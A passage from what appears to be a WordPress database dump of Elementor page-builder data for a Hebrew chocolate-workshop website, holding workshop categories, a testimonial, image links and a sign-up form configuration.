Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(74,27,'_wp_page_template','elementor_canvas'),(75,27,'_elementor_edit_mode','builder'),(76,27,'_elementor_template_type','post'),(77,27,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":10,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/todd-quackenbush-700.png\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":9,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/52.png\"},\"space\":{\"unit\":\"%\",\"size\":\"18\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is 